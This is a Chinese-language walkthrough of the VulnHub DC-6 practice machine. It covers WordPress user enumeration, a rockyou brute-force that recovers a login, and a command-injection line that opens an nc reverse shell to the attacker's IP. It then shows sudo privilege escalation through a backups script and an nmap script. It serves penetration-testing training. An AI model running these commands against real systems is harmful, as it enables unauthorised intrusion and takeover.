-
环境搭建 -
渗透测试
-
靶机镜像下载地址:https://vulnhub.com/entry/dc-6,315/ -
需要将靶机和 kali 攻击机放在同一个局域网里; -
本实验kali 的 IP 地址:192.168.10.146。
┌──(root💀kali)-[~/桌面]
└─# nmap -sP 192.168.10.0/24
┌──(root💀kali)-[~/桌面]
└─# nmap -sS 192.168.10.151
┌──(root💀kali)-[~/桌面]
└─# nmap -sV -p 22,80 192.168.10.151
┌──(root💀kali)-[~/桌面]
└─# vim /etc/hosts
192.168.10.151 wordy
┌──(root💀kali)-[~/桌面]└─# whatwebhttp://192.168.10.151
┌──(root💀kali)-[~/桌面]
└─# dirb http://wordy/
┌──(root💀kali)-[~/桌面]
└─# wpscan --url http://wordy/ -e // -e 枚举
┌──(root💀kali)-[~/桌面]
└─# wpscan --url http://wordy/ -e // -e 枚举
admin
graham
sarah
mark
jens
┌──(root💀kali)-[~/桌面]
└─# vim wordy_user.txt
┌──(root💀kali)-[~/桌面]
└─# gzip -dk /usr/share/wordlists/rockyou.txt.gz
┌──(root💀kali)-[~/桌面]
└─# ls /usr/share/wordlists/rockyou.txt
/usr/share/wordlists/rockyou.txt
┌──(root💀kali)-[~/桌面]
└─# wpscan --url http://wordy/ -U wordy_user.txt -P /usr/share/wordlists/rockyou.txt
┌──(root💀kali)-[~/桌面]
└─# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
┌──(root💀kali)-[~/桌面]
└─# wpscan --url http://wordy/ -U wordy_user.txt -P passwords.txt --max-threads 100
密码:helpdesk01
登录一下后台~
kali开启监听
127.0.0.1 | nc 192.168.10.146 4444 -e /bin/bash
msf6 > search activity monitor
graham@dc-6:~$ echo"/bin/bash" > /home/jens/backups.sh
graham@dc-6:~$ sudo -u jens /home/jens/backups.sh
jens@dc-6:/home/graham$
所以可以使用nmap来提权。
jens@dc-6:/home/graham$cd~jens@dc-6:~$echo"os.execute('/bin/bash')">shelljens@dc-6:~$sudonmap--script=shell
成功拿到flag:
🔗Reference:DC-6
- https://zhuanlan.zhihu.com/p/534321293
- https://blog.csdn.net/qq_38612882/article/details/122648462
- https://blog.csdn.net/kengkeng123qwe/article/details/124869038
原文始发于微信公众号(鼎新安全):Vulnhub-DC6靶机渗透
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论